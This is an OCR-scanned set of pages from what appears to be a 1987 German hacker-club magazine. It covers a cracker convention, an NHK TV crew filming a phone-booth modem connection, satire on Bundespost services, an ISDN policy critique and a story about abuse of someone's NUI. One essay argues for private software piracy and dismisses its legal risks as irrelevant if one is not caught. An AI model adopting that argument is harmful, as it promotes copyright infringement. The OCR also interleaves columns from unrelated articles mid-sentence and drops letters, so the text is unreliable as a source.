verachten. Das wrde bedeuten, da man sich vor der Wahrheit versteckt.

I m W o n n e m o n a t Juli fand in Stuttgart wieder ein 'Convention statt. Bekannte C r a c k e r und Hacker aus Deutschland, der Schweiz, F r a n k r e i c h und Bayern waren angereist. Zwischen Freitag und Sonniag fanden viele keinen Schlaf, da es neben dem Cracken und dem Erfahrungsaustausch auch Harddisks (ST), Demos und einen Mega ST-2 zu bestaunen gab. (Der Mega ST konnte nichts, und selbst das nicht lOOprozentig.) Das babylonische Stimmengewirr wurde mittels der Sprachen Englisch und Assembler berwunden, bis zu dem Moment, in dem eine Sicherung etliche Ramdisksund einen Prozessor ins Nirwana schickte. Die Nacht war dem Hacken vorbehalten. Besonders Delphi und eine Schweizer Pd muten dran glauben. A u f dem Convention hat sich auch gezeigt, da es einen selbst Hackern nicht immer bekannten (Hi Chaos) Unterschied zwischen Raubkopierern und Crackern gibt. Raubkopierer: - Null Originale - Wissen grade, wie man ein Copy bedient. - Verkaufen illegal Software Cracker: - Machen Programme 'handlicher' - Haben Dutzende von Originalen - Programmieren wie die Idioten - Hassen raubkopierer und die Pest. D A S ist ein riesiger Unterschied. Sollte vielleicht manchem zu denken gben. Terra

goblln (j^f^pic SntcnSdjIciibcr

14

15

Hambulgel Hackel
Japanisches Fernsehen zu Gast beim C C C Zwei J a h r e d a n a c h " ist die j a p a n i s c h e f f e n t lichkeit offenbar a u f den d a m a l i g e n (??? hehe) H a c k in T s u k u b a a u f m e r k s a m g e w o r d e n . Die japanische Fernsehgesellschaft N H K " entsandte daher ein mit Ausdrucken von PhineasProtokollen bewaffnetes Fernsehteam, um die betreffenden deutschen Hacker zu befragen und ihnen ein wenig auf die Finger zu schauen. M a n traf sich bei Steve und beantwortete ersteinmal einige allgemeine Fragen zur Ttigkeit und Motivation der C C C ' l e r sowie einige Einzelheiten des TsukubaZugangs aus Hamburg. Ich grte per TV unseren alten Freund Youhei Morita (Network Manager des KEK), der uns damals freundlicherweise privilegierte accounts eingerichtet hatte. Natrlich konnte (und wollte?) man nach so langer Zeit nicht alle Einzelheiten des damaligen Hacks z u m Besten geben. Stattdessen einigten wir uns, a m Beispiel Autohacking den japanischen Zuschauern, besonders denen unter 18 Jahren, einmal zu demonstrieren, wie wenig technische Infrastruktur als Eintrittskarte fr das Globale Dorf notwendig ist. W i r sattelten also die Pferdchen und kmpften uns durch den frhen Feierabendverkehr bis zur Auenalster vor, um den Japanern noch etwas Hamburg als Gratisbeilage mitzugeben. Vor einer Datentankstelle A u f dem Randgrn hielten wir zum Aufbau der TV-Gertschaften.

Das Drehbuch hatten wir uns spontan unterwegs ausgedacht: Eleganter Sportwagen mit Inhalt (2 Hacker, ein MultiSpeed und ein Schlabberphon) nhern sich, ber den staubigen Fuweg entlang der Alster gleitend,der gelben DTankstelle. Ein Hacker steigt aus, das lange Serialkabel langsam abwickelnd, und befestigt das Schlabberphon am Schnorchel zur grossen weiten Welt. Zwanzig Pfennige klimpern leise in den Mnzer, dazu Rockmusik aus dem Auto. Der zweite Hacker verharrt vor seinem japanischen Laptop und reizt Datex an... Abtanz.

COMMUNITY COMPUTING '87


Report now available I f you were at C o m m u n i t y C o m p u t i n g '87 in J a n u a r y , you'll want a copy of the report, to remind you of all those names, ideas, wonderful times, awful kitchen staff and what it was like the weekend before B r i t a i n ground t o a halt in snowdrifts. I f you weren't there you'll need a copy to realise just how much you missed. To remind you - it includes items on: - access to computers for disabled people

M i t der Verbindung klappte es nicht ganz, da die Konfiguration (mit freundlicher Untersttzung von auf die Schnelle zusammengestellt worden war. Das jedoch war den Japanern nicht so wichtig, denn da es funktioniert, glaubten sie uns auch so. Viel wichtiger schien ihnen, das Material so schnell wie mglich nach Japan zu bekommen. Vielleicht, damit ihnen keiner die Story abjagen kann

- access to training - funding computer projects - women &: new technology Copies of the report are available from: Joy Bryant Community Computing in Newcastle 2nd floor, L o w Friar House 36-42 Low Friar St Newcastle upon Tyne N E t 5UE Send 1.50 per copy (inc postage) with your order. Cheques should be made payable to C O M M U N I T Y C O M P U T I N G N E T W O R K Please pass this message on to your friends, colleagues, anyone. C C N Regional Reps on Geonet (Aug 87): L Y N D A . G A R F I E L D South Wales S U N N Y H I L L Cumbria C C I N North East A N D general enquiries R . H A S E L G R O V E West Yorks J U L I A N . T O D D West Country P E T E R O W A N Kent & E. S ussex A N D membership applications L1TRU London For other C C N members use the Geonet command LIST CCN-ML COMPOST:SERVER 5-Aug-87 15:27 CLINCH/ALLGEMEINES/HHNET/05.08.87

(nach 2 Jahren !!). Als wir schon mit dem Abbau begonnen hatten, lie ich mich mich dazu hinreissen, meinen Koffer vor der Kamera auszupacken. Der Kameramann zeigte sich entzckt, besonders vom Gasltkolben und der eingepaten 20 M B Festplatte.
Vic.

CLINCH/DS-RED/VIC/28.08.87/00:51/2679 Z.

16

( ^ S > i c nfcnSijIciibcr

( ^ f ^ r S i c Snfcittfjlcitbcr

Das Mutantenkorps der Post


W i r d Uri Geller n a e c h s t e r P o s t m i n i s t e r ?

SI5UWD HUMORREPAKTgUR* PASS ICH NICHT LACH5!!

BUCHERI
(1) E A R N Remingway W e m die B E L L - N o r m schlgt

W h r e n d ParaPsychologen in aller W e l t sich verzweifelt bemhen, den wissenschaftlichen Nachweis der Existenz bersinnlicher Phnomene wie Telekinese, Telepathie, Telefonieren u n d dergleichen zu e r b r i n g e n , ist die Deutsche Bundespost m a l wieder einen Schritt weiter. F E R N W I R K E N heit das Stichwon, mit dem die Post in den Bereich des bersinnlichen vorstoen . will. Im kurzen Amtsenglisch: T E M E X . Derzeit gibt es noch erhebliche Schwierigkeiten, eine gengende Zahl geeigneter Medien zu verbeamten, daher setzt man amtlicherseits auf Altbewhrtes, nmlich die Mikroprozessortechnik. W o frher ein simples Relais ausreichte, um einen Einbruch zu melden und die Ordnungshter in Marsch zu setzen, waltet heute der Computer und simuliert fr nur noch D M 8.50 j e Monat (Preisfrage: W o h e r kennen wir diesen Betrag?) einen schlichten Schaltkontakt, der dem gestressten Yuppie am Strand der Costa Quanta beispielsweise mitteilt, da das heimische Aquarium seinen Inhalt in die darunterliegenden Wohnungen entleert hat. Zu allem berdrudarf sowas nureinmal im Monat passieren. Neigt das Aquarium zu periodischer Leckage, wird es automatisch teurer. Der technisch versierte Leser wird sich zu Recht fragen, warum ein Ereignis, das technisch gesehen dem Abheben des Telefonhrers entspricht, pltzlich so teuer wird. Der Grund dafr liegt wohl i m geplanten Ersatz der stranfaelligen Technik durch medial begabte Postler, deren Arbeitsplatz finanziert sein will.

Humor
frdert Kreativitt und Produktivitt

(2) Karl May Der Satz i m Silbensee Einfhrung in die unstrukturierte Textverarbeitung (3) Karl Juni Winneone (4) Karl Juli Winnetwo (5) Marcel Plus A u f der Suche nach dem verlorenen Byte (11) Jack Tramiel (Hrsg.) Der Untergang des R O M (12) Agatha Christie Reset a m Nil (13) Astrid Linkdrhn Pippi L a n g w o r t (14) Christian Manmudasmal Anderssehn Peterchens Druckeranpassung (15) Johann Vorgang von Gte Die Leiden des j u n g e n K o n v e r t e r (16) Hermann Hesse Das Magnetblasenspiel

H a m b u r g (clinch) - Spa und H u m o r steigert die K r e a t i v i t t , sagt die Psychologin D r . Alice M . Isen von der University o f M a r y l a n d in Baltimore. So konnte sie feststellen, da die K r e a t i vitt von Versuchspersonen deutlich hher w a r , wenn sie gerade einen lustigen F i l m gesehen hatten. Sie lsten dann z u m Beispiel deutlich schneller das Problem, eine K e r z e mittels Heftzwecken so an einer K o r k w a n d zu fixieren, d a sie nicht t r o p f t - i n d e m sie k u r z e r h a n d die Schachtel fr die Zwecken an die W a n d hefteten und als K e r zenhalter entfremdeten. " U n e r f r e u t e " Zeitgenossen waren dagegen meist O p f e r einer " f u n k tionalen F i x i e r t h e i t " , das heit, sie tendierten dazu, die vorgelegten O b j e k t e n u r i h r e r blichen Bestimmung gem zu verwenden. Der Psychologe Davin Abramis von der California State University in L o n g Beach stellte laut New York Times bei der Untersuchung von 382 Personen fest, da jene am erfolgreichsten waren und mit ihren Kollegen am besten auskamen, die in ihrer Arbeit auch Spa sahen. Eine wichtige Quelle hierfr war das Scherzen mit Kollegen. Da H u m o r Kindern das Lernen erleichtert, stellt Dr. D o l f Zillman im Handbook o f Humor Research (Springer Verlag) fest. Er warnt allerdings vor Ironie, die junge Kinder meist nicht verstehen und empfiehlt, mglichst ber Dinge zu witzeln, die nicht gerade Lemgegenstand sind. Bei Jugendlichen und Studenten hingegen kommen bezugsfremde Scherze eher schlecht an. Generell kommt dem gemeinsamen Lachen eine wichtige soziale Funktion zu, indem es einen unausgesprochenen Konsens signalisiert, insbesondere bei "heiklen" Themen.

(17) Euripides Ariadne auf Nixdorf (18) William Scheckspeare (6) W . Irrsinn Z e n oder die Kunst, undokumentierten Code zu warten (7) Charles Bugkowski Gedichte, die einer schrieb, bevor er seinen Editor aus dem zehnten Stockwerk w a r f (8) Tracy Kleinbahn Die Seele einer neuen Schiene (9) Harun Digit Al Rashid A l i Caga und die vierzig Zeichen (22) Kerningham/Ritchie P r i n t b a d der C - F a h r e r (23) Ian Lemming F o r your A I only (20) Marquis de Start Qulcode (21) Ladislaus Freiherr von Software-Masoch W i e ich lernte, P u b l i c - D o m a i n - P r o g r a m m e zu lieben K i n g Clear (19) Ready Miller Stille T a g e in C L I N C H

Eine weitere Ausbaustufe von T E M E X sieht unter anderem die Fernablesung von Messgerten vor. Die hiesigen Wasserwerke erwgen bereits ernsthaft, Gebrauch davon zu machen, um endlich litergenau feststellen zu knnen, wann die Pause des Lnderspiels begonnen hat. Unter Zurckstellung erheblicher datenschutzmiger Bedenken entsteht hier durch die Fernablesung der Wasseruhren eine Alternative z u m T E D , der den neuen Medien - im wahrsten S i n n e des Wortes - nicht mehr das Wasser reichen kann.

Aus DIE ZEIT Nr.36, 28. August 1987 goblln p0stmu22.ds 220787 2047 jwi 060506 Sep 87 BEREICH CLINCH HUMOR CL1NCH/ALLGEMEINES/UGE/07.09.87/05:11/1703 Z. SnfciiSdjIciiber

Volksmrchen (10) Raymond Handler Der lange Code z u m k u r z e n Absturz ^ f ^ f c S i c SnienSdjIcubcr

18

19

Raubkopieren

D i e Gegner der "Raubkopiererei" (hauptschlich Softwarefirmen, komisch, nicht war?) haben sich dennoch einige Argumente gegen diese Form des Vertriebes ausgedacht. Sie sind es wert, einmal unter

V o r w e g : die ganze Diskussion u m die R a u b k o piererei ist i m G r u n d e ohnehin sinnlos, denn k o p i e r t w i r d o h n e h i n - egal, w i e gut die A r g u mente der K o p i e r g e g n e r auch sein mgen. Dennoch - damit empfindsame Gemter keine Gewissensbisse kriegen - hier einige wie ich finde schlagende Argumente fr die sog. "Raub"kopiererei: In der Praxis sieht es in der Regel so aus, da Mikrocomputersoftware von kommerziellen Anwendern hufig gekauft wird, private Anwender dagegen lieber auf preisgnstigere Raubkopien zurckgreifen. Daraus zu folgern, kommerzielle Anwender seien in irgendeiner Form den privaten Kopierern moralisch berlegen, ist Unsinn. Kommerzielle Anwender kaufen eher, weil a) bei ihnen die Gefahr der Entdeckung grsser ist als bei privaten (Kundenverkehr, rgerliche Mitarbeiter u..) b) weil kommerziellen Anwendern oft die erforderlichen Verbindungen zur Kopiererszene fehlen und das Aufbauen dieser Verbindungen oft teurer und riskanter ist, als die Software zu kaufen c) kommerzielle Anwender mehr als private auf den Support der Software angewiesen sind und d) weil, wenigstens in einigen Bereichen, die Produktivittssteigerung durch Software so immens ist, da die Anschaffungskosten verglichen damit lcherlich gering erscheinen e) weil in einigen Bereichen EDV-Investitionen sogar noch strker als andere Investitionen steuermindernd wirken. W i e man sieht, f n f gute Grnde fr den kommerziellen Anwender, Software zu kaufen. A l l e diese Grnde fallen fr die privaten Anwender, also fr Dich und mich, weg. U n d - D u und ich kaufen j a auch so gut wie nie Software, oder? I m Grunde ist doch der Softwaremarkt eine sehr soziale Veranstaltung: Finanzkrftige Kufer kaufen die Software, finanzieren somit die Entwicklungskosten, finanzschwache private Anwender ziehen sich eben Kopien. Eigeniich sollten alle zufrieden sein.

die Lupe genommen zu werden. Eines der wichtigsten lautet: Kopieren fgt den Firmen erheblichen finanziellen Schaden zu, jede unautorisierte Kopie ist ein Verdienstausfall fr die Herstellerfirma.

Ein besonders herzzerreiendes Argument - fast ein Wunder aus dem M u n d der sonst gar nicht so sozialen Softwareindustrie - lautet: Die Einbuen, die durch Kopiererei entstehen, gehen zu Lasten der armen, angestellten Programmierer, die u m die Frchte ihrer harten Arbeit gebracht werden. Unsinn. Erstens: Ein Unternehmen, das angestellte Programmierer in Abhngigkeit von verkauften Stckzahlen bezahlt, wlzt das unternehmerische Risiko (da das Unternehmen als Rechtfertigung fr seine Gewinne benutzt) auf abhngig Beschftigte ab. Das ist ungerechtfertigt. Ein Programmierer kann sich nicht leisten, von Lust und Laune des Marktes abhngig zu sein, wenn es um sein Einkommen geht. Schlielich ist er abhngig beschftigt, nicht etwa Unternehmer. Das viele Unternehmen es dennoch schaffen, Programmierer zu derartigen Konditionen zu beschftigen, liegt teilweise auch am Desinteresse derselben an ihren eigenen Rechten. Ich kenne jedenfalls gengend Programmierer, die sich alles gefallen lassen, wenn es nur ein paar Mark gibt und sie ordentlich daddeln drfen. U n d selbst wenn ein Programmierer in Abhngigkeit von Stckzahlen bezahlt wird, schadet ihm Kopiererei nur unter der unbewiesenen Annahmen, da diese die Ertrge schmlert. Und noch etwas: Trotz allem Geschrei geht es den meisten Softwarefirmen gelinde gesagt sehr gut. Kaum eine andere Branche hat hnliche Zuwachsraten zu verzeichnen. Unterm Strich profitiert die Mikrocomputerindustrie sogar von der Kopiererei. Dazu ein paar Beispiele:

Weiter: Kopien machen ein Programm bekannt. Die Wirtschaft verlangt nach Krften mit EDVErfahrung. Wenn sie junge Leute mit ComputerErfahrung einstellen: womit haben die ihre Erfahrungen gesammelt? Mit gekaufter Software? Wohl nur selten. "Raub"kopien knnen sogardie Umstze von Softwarefirmen steigern. Angenommen, ich habe zu Hause ca. 7 verschiedene Textprogramme rumfliegen - alle natrlich selbst kopiert- und arbeite nun vorzugsweise mit, sagen wir, M S W O R D . Ich werde nun von einer Firma eingestellt und entscheide mit ber die Anschaffung eines Satzes von Textprogrammen. Fr welches werde ich mich ausssprechen? Erraten! Natrlich gibt es bei der Kopierei juristische Probleme. Nur: wen interessieren die? Wer sich nicht erwischen lsst, hat nichts zu befrchten. Die Flle, in denen private Kopierer, die nicht mit geklauter Software gehandelt haben (was ich brigens ablehne) kann mensch an den Fingern einer Hand abzhlen. Also alles in Ordnung? Fast. Der Kopierer hat leider

Diese Argument ist nicht ganz von der Hand zu weisen. Allerdings gilt es nur in stark abgeschwchter Form. Bsp.: ein entfernter Bekannter von mir hat sich krzlich fr seinen privaten Bedarf ein Statistikprogramm beschafft - natrlich kostenlos. Dieses Programm htte ihn, legal gekauft, lppische 18.000 D M gekostet. Es ist natrlich Unsinn anzunehmen, er htte es fr diesen Preis gekauft. Auerdem: was interessiert mich als Anwender die Ertragslage einer Softwarefirma? Eine Softwarefirma ist kein Wohlfahrtsverein. Sie will Geld verdienen. Ich will kein Geld ausgeben. So what? Ein weiteres Argument der Gegner: Kopieren macht die Software teuerer. Nochmal: was interessiert mich, wie teuer Software ist? Ich kaufe sowieso keine. Von niedrigeren Preisen profitieren also ohnehin nur kommerzielle Anwender- und fr die sind die Kosten fr Software i m Vergleich mit dem Produktivittszuwachs wie gesagt meist vernachlssigbar.

Der immense Erfolg des C-64 wre ohne eine gut funktionierende Infrastruktur, die auch den letzten Anwender mit kostenloser Software versorgt, nicht denkbar gewesen. Es ist bekannt, da bei der Entwicklungs des C-64 eine M a x i m e war, auf dieser Maschine einen effektiven Kopierschutz schon von der Architektur der Hardware unmglich zu machen. Commodore will schielich Hardware verkaufen, und nichts wirbt besser fr einen Computer als kostenlose, leicht erhltliche Sofware. Nchstes Beispiel: die Diskettenhersteller. W i e shen deren Umstze ohne das segensreiche Tun der Kopierszene aus? Oder: Verlage. W e r kennt nicht die berhmte Buchreihe "Das Buch zu ihrer Raubkopie", die mittlerweile fast jeder im Mikrocomputerbereich ttige Verlag im Programm hat. Es ist kein Geheimnis, da z.B. Data Becker, einer der militantesten Gegner der Raubkopiererei, von einigen Buchtiteln mehr verkauft hat, als von dem dazugehrigen Programm.

immer noch oft das Problem, an Dokumentation heranzukommen. Oft rennt er zum Kopierladen oder kauft Bcher aus der oben erwhnten Buchreihe. W a r u m findet sich nicht mal jemand, der zu bekannter Standardsoftware Dokumentation auf Disketten vertreibt, die einfach mit der Software zusammen kopiert werden kann? Technisch ist das doch berhaupt kein Problem. Hier mu noch einiges passieren. Mich interessiert auch, wie andere ber dieses Themadenken: Beitrge erwnscht. Caesar/Stoepsel CLINCH/DS-RED/CAESAR/02.10.87/19:54/7438Z.

20

SiilciiSifjiciibcr

( J f ^ p i c

Snlcnfijictiitr

21

Goldenes Kalb
Zurrr Q u e r f u n k r a t s c h l a g i n B e r l i n nicht mehr der Fall und macht ironischerweise gewerkschaftliche Organisation einfacher als frher. Statt sich zum Abliefern eingegebener Texte in den Der folgende T e x t ist eine K r i t i k zu einem Beitrag f r die Veranstaltung "Informationsgesellschaft - das goldene K a l b der P O S T - M o d e r n e " a m Sonntag, 6.9.87 neben der Funkausstellung. Der B e i t r a g selber liegt n u r in gedruckter F o r m vor, unsere K r i t i k ist a b e r auch aus sich selbst heraus verstndlich. ZuB.l.b) Die "Verheimarbeitung" der Arbeitnehmerschaft wird nicht durch die Verhinderung einer Einfhrung neuer Kommunikationstechniken erschwert/unmglich gemacht. I m Gegenteil: Mit der existenten Technik kann der Anteil der Kommunikationskosten an den Heimarbeitspltzen ohne Schwierigkeiten "aus der Portokasse" bezahlt werden und wird durch I S D N voraussichtlich nur teurer. D i e Schwierigkeiten liegen in den Bereichen der Organisation und Mitarbeiterfhrung, bzw. bei den heutigen Unternehmensstrukturen sind "Heimarbeitsbros" meist zu teuer und insbesondere gelingt es noch nicht, durch die Netze ein hnlich dichtes Geflecht von Informationsdynamik (Klatsch!) zu schleusen, wie in einer Brogebudesituation mit gemeinsamer Kantine - und das wird nach unseren Kommunikationserfahrungen in den Netzen glcklicherweise auch nie mglich sein. Es stellt sich n m l i c h heraus, da die Medienspezifik der digitalen Kommunikationstechnologie weitgehend unerforscht ist und hier auf Kapitalseite erheblich berzogene Erwartungen bestehen, die sich auf Kritikerseite in erheblich berzogenen Befrchtungen spiegeln. Siehe hierzu: "Teleheimarbeit ist kein Renner" in " D i e Angestellten" der D A G vom 7.8.87. Rechner des Arbeitgebers "einzuloggen", kann sich der Heimarbeiter genausogut in eine Mailbox seiner Gewerkschaftsgruppe einwhlen. Damit wollen wir nicht sagen, da dadurch gewerkschaftliche Organisation besser/einfacher wird, die Situation ist jedoch nicht so hoffnungslos, wie das oft dargestellt wird. Es ndern sich halt - technologiespezifisch gewerkschaftliche Organisationsformen genauso, wie sich" auch die Produktionsformen verndern. Bewutseinsmig ist hier nur die Kapitalseite in der Problemerkennung wesentlich weiter. Erfahrungen in England zeigen brigens, da regionale Vorortzentren fr Verwaltungsttigkeiten entstehen, die von mehreren Firmen gemeinsam betrieben und unterhalten werden und in letzter Konsequenz zum "mietbaren" Bro fhren, wie dies vor ca. einem halben Jahr v o m S P I E G E L aus Hamburg berichtet wurde. Zu B.l.c) Wiederum der gleiche Denkfehler der Autoren. U m alle die prognostizierten Entwicklungen im Dienstleistungsbereich eintreten zu lassen, braucht es kein I S D N , das geht V O N D E R T E C H N I K her bereits heute ber Telefonleitungen. W a s fehlt, sind die "Programme", das Know-How, wie sich solche Dienstleistungen maschinisieren lassen. Es sind die "Hacker", die sich dieses Wissen heute spielerisch aneignen, mag es ihnen auch nicht bewut sein. Und schon bald werden einige dieser Zunft ihre Erfahrungen verkaufen. Auerdem sollte man in Betracht ziehen, da auch "den Kapitalisten" inzwischen deutlich wird (wofr sind schlielich die Horden von Psychologen nach '69 ausgebildet worden...), da es so etwas wie "Psychoarbeit" gibt - Stichwort: Verkaufsfordernde Manahmen, "human touch" (sie!). Anzumerken ist, da ein Dienst wie B T X , der eine deutliche Trennung zwischen Anbieter und Konsument macht, fr den Konsumenten extremim Preis heruntersubventioniert wird, whrend ein Dienst wie DATEX-P, der insbesondere fr die internationale Vernetzung von Einzelnen und Gruppen groe Bedeutung hat (zB. PeaceNet in den U S A bzw. GreenNet in G B ) , im Vergleich zu anderen Lndern sehr teuer ist. Damit pflegt die BP ber ihre Gebhrenpolitik den Provinzialismus.

ZuB.2 Hier kommen die Autoren uE. endlich an den Kern der ISDN-Problematik. Die Mibrauchsgefahren, die in dieser zentralisierten "eierlegenden Kommunikationsmilchsau" liegen, lassen die Herzen von Pinochet ber Jaruselzki bis George Bush schneller schlagen. So, wie I S D N heute durch die CCITT standardisiert ist, wird es keine anonymen Anrufe mehr geben. In der Beziehung ist auf der politischen Ebene bisher kein Problembewutsein entwickelt und die Techniker argumentieren Morgensternmig: Es kann nicht sein, was nicht sein darf. Fr die Ablehnung von I S D N finden sich sogar Bundesgenossen in der Mailboxindustrie, zumindest beim politisch bewuten Teil derselben. Noch einmal: aus technischen Grnden ist I S D N nicht notwendig. Die einzige Rechtfertigung dafr liegt in den Kapitalverwertungs/Neuinvestitionszwngen der Elektronikindustrie.

terhin - parallel zu I S D N - auszubauen. An diesem Netz wird T E L E T E X als eine Art modernes T E L E X be trieben. F r s o l c h e S i t u a t i o n e n i s t D E N G R N E N in Bonn eine partielle Teilnahme an P A R L A K O M zu empfehlen, da im Rahmen von P A R L A K O M geplant ist, die Heimatwahlkreise der Abgeordneten via T E L E T E X mit dem jeweiligen Abgeordnetenbro in Bonn auf Kosten der Steuerzahler zu verbinden. Damit wre dann im Katastrophenfall eine eigenstndige Informationsmglichkeit "von der Basis"ins "Raumschiff Bonn" gegeben. (Siehe dazu auch: ' S T U D I E ' fr den geplanten Computereinsatz der Fraktion D I E G R N E N im Auftrag des Deutschen Bundestages, Verlag Der Grne Zweig, Nr. 117) Ein Vergleich mit der Plutonium wirtschaft geht fundamental am Wesen der Rechnervemetzung vorbei. Eine Plutoniumwirtschaft ist extrem schutzbedrftig auf Grund eines materiellen "Plutoniumhaufens", der physikalisch an genau umgrenzter Stelle vorhanden ist und damit mgliches Ziel terroristischer Angriffe darstellt. Demgegenber zeichnet sich eine weitergehende Computervemetzung dadurch aus, da das Gesamtsystem immer redundanter d.h. (zer)strungsunanfiliger wird. Ein ausgefallenes Rechenzentrum kann innerhalb von Millisekunden durch Rechenkapazitt an anderer Stelle ersetzt werden - dank der Vernetzung. In diesem Sinne wird von den Netzarchitekten durchaus schon in Begriffen von "Dezentralisierung" und "Redundanz" gedacht - ganz im Gegensatz zur Strommafia. Vor zwanzig Jahren htte die Bombe im Rechenzentrum des Springer Verlags 2 - 3 Jahre Arbeit zunichte gemacht, wenn sie nicht nur eine Kloschssel, sondern Plattenspeicher zerstrt htte. Die Zeiten sind jedoch lange vorbei und beim letzten Druckerstreik haben sich - dank Rechnerverbund kanadische Drucker als Streikbrecher einsetzen las-

Z u B.2.b) Z u m Abspeichern der Gesprche: Dies ist digital zu teuer, da durch die Digitalisierung das zu speichernde Datenvolumen gegenber analogem Dampftonband zu stark aufgeblht wird. Gefhrlich ist in dem Zusammenhang jedoch, da die Digitalisierung aller Signale einen Schritt nher an automatisierte "Reizworterkennungsautomaten" fhrt, die dann - in einer Hierarchie steigender "Wichtigkeit" - automatisch bestimmte Gesprche zur Aufzeichnung aus dem Telefon verkehr "herausfischen". Aber auch das ist nichts Neues und wird heute bereits praktiziert. Einfacher wird durch I S D N das Mithren, Mitschneiden und Analysieren von Textkommunikation (zB. T E X T O R Programmpaket des B K A ) . Einziger Schutz - und das wird auch aus industriellen Interessen intensiv entwickelt - ist die Verschlsselung aller Daten, die ber irgendeine Leitung gesendet werden.

Z u B.2.C)

Aspekte einer politischen Debatte zu I S D N Zur Zeit wird an der Zerschlagung der Bundespost als Kommunikationsmonopol gefingert. Siehe dazu die Dokumentation in der S Z Nr. 174 vom 1./2. August 1987 zu "Feststellungen und Empfehlungen der Regierungskommission". Die Hauptinteressen dabei sind uE. wirtschaftlicher Natur unter dem Motto "Gewinne privatisieren, Verluste sozialisieren".

Das A r g u m e n t , d a durch die digitale Verheimarbeitung die gewerkschaftliche Organisation geschwcht wird, s t i m m t nur teilweise. Klassische Heimarbeitspltze mit der bekannten fastU n m g l i c h k e i t gewerkschaftlicher Organisation zeichnen sich dadurch aus, da die Heimarbeiter nur durch persnliches Erscheinen an der Haustr erreichbar waren. Dies ist nun aber - durch das Netz-

Folgendes ist wichtig zu wissen: Nach Tschernobyl wurde kein Katastrophenalarm ausgelst, so da potentiell noch alle Telefone funktionierten und nicht nur die rot markierten fr den Krisenfall. In ganzen Regionen brach deshalb der Telefonverkehr wegen berlastung zusammen, so da das Telefonnetz nicht mehr zum Krisenmanagement taugte. Daraufhin ist auf Kabinettsebene beschlossen worden, in Zukunft das eigentlich veraltete, digital geschaltete D A T E X - L Netz als Notstandsnetz wei^ J f ^ r p i c Solcnrfjlciiiicr

22

^ f ^ f e S i c SniciiSd)lcnbcr

23

Nach Einschtzung der Postgewerkschaft ist in Zukunft wahrscheinlich mit folgender Situation zu rechnen: - D i e Post wird aufgeteilt in unabhngige Verwaltungsbereiche fr den gelben und grauen Bereich. Beim grauen Bereich verbleibt das Netzmonopol. Ein Minderheitenvotum, auch mindestens einen privaten Netztrger zuzulassen, fiel mit immerhin 6:6 Stimmen uerst knapp aus. - Nur die BP ist Berechtigt, den Telefondienst anzubieten, jedoch endet ihr Monopol an der Anschludose.

allen elektronischen Netzen besteht, die nach unserer Einschtzung die Mibrauchsgefahr erheblich einschrnkt bzw. diese Infrastruktur als Beherrschungsinstrument wenig tauglich macht.

Klaus Schleisiek, Reinhard Schrutzkl, Jrgen Wieckmann, Tom Todd, Thomas Esher, Udo Schacht Mitglieder Im Arbeitskreis Politischer Computereinsatz (APOC)

ks 251950 Aug 87 BEREICH APOC BAG QUERFUNK.KRT CLIN CH/PIJTIK/KS/25.08.87/20:12/11558 Z.

mit

PRAKTISCHE CHAOS-MAGIE
PETE C A R R O L L (GB) und FRATER V . ' . D . " .
: S E M I N A R " C H A O S - M A G I E U N D F R E I S T I L S C H A M A N I S M U S " i

(BRD)

GEMEIN
- Die 'Mehrwertdienste' Datex, Telex, Teletex, Temex (die "ex"-Dienste) und der Endgertemarkt werden zu 50% der BP belassen, der Rest dem Markt. Weder fr die BP, noch fr die freien Anbieter gibt es irgendwelche Auflagen, und die freien Anbieter mssen sich die bentigte Leitungskapazitt beim grauen Monopolisten mieten/kaufen. - Es wird Privaten gestattet, eigene Grundstcke selber fr die interne Kommunikation auch ber andere Grundstcke hinweg zu verkabeln. Dies bedeutet keine nderung fr die brgerrechtsrelevanten Aspekte von ISDN gegenber der jetzigen Situation. Auch in Zukunft soll ein Monopolist der Betreiber des geplanten ISDN Netzes sein. Nebenbei: Die Essenz des Machtanspruchs der DBP leitet sich daraus ab, da es gesetzlich verboten ist, Kommunikation Uber Grundstcksgrenzen hinaus von irgendjemand anderem als der Post machen zu lassen. (Sonderfall Bundeswehr). Die Bundesbahn hat nur deshalb ihr eigenes Telefonnetz, weil ihr "Grundstck" sich ber die gesamte Republik erstreckt. Ich halte es im Sinne von Dezentralisierung und Basisdemokratie fr eine grne Forderung, die Legalisierung der "Verkabelung" im Rahmen der Nachbarschaftshilfe zu fordern. Unseres Erachtens ist nicht die Vernetzung an sich der Sndenfall, sondern die Monopolisierung der Netztrgerschaft. Auch nach der heraufdmmernden Neustrukturierung mu bei einem Mibrauchsversuch nur eine Stelleusurpiertwerden.Daskontrastiertimmernoch erheblich mit der Situation in den U S A , wo auf Grund des Fehlens eines Monopols jenseits der gelben Post eine wahrhaft chaotische Situation in fast Diese kleine unbedeutende Geschichte passierte vor zweieinhalb Jahren. Erst heute ward sie m i r zugetragen und wir wollten den Daten nicht glauben, die uns unsere O h r e n ins H i r n spielte. Da gab es in unserer kleinen 'Galerie' eine kleine Vorstellung des Chaos Computer Clubs. Es war nette intime Atmosphre bei Mandarinen und Apfelmnnchen. Nie waren mehr als 10 Leute gleichzeitig anwesend, aber da keiner der Kiddy-Cracks eine offizielle Leih-NUI hatte, war Not am Mann. Die Veranstaltung drohte langwei lig zu werden. Und jeder neue Besucher wurde erst mal nach einer NUI gefragt. Und tatschlich: Als schon keiner mehr dran glaubte, betrat ein netter junger Mann unsere Rume und nickte. Ja, er habe eine NUI und sei auch bereit, sie zur Verfgung zu stellen. Klasse. Und als er sie in die Tastatur tippte, schauten alle weg. Wir haben von ihm nie wieder etwas gehrt. Den Grund dafr erfuhren wir erst jetzt: Die Rechnung, die die Post ihm pnktlich spter aufmachte, belief sich auf etwa 7000 D M . Haben wirklich alle weggeschaut? Egal ob Bielefelder oder Hamburger. Es ist einfach schweinisch, die N U I einer Privatperson als Leih-NUI zu verwenden! Und wir sind nun solidarisch sauer. Mit zweieinhalb Jahren Versptung. Davon kann sich unser Bielefelder Besucher nichts kaufen. Weitere Worte will ich mir sparen. Weder was von Moral auf der einen noch 'Confidenza' auf der anderen Seite auch nix von Vorsicht und Datenhygiene/hysterie/hyne. Ein jeder beantrage seine N U I selbst bei der POST. CLINCH/DS-RED/PADELUUN/04.10.87/22:24/1617Z. it/citftyicuicr ( ^ ^ c SnfciiSiijfciibcr

